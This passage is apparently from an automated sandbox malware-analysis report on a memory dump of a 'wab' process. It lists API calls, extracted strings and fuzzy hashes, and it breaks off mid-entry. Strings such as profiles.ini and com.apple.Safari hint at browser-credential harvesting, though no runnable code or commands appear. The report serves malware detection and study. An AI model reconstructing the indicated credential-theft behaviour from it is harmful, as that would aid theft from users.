                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4255912815-0
                                                                                                                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                                                • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                Strings
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1043902810-0
                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
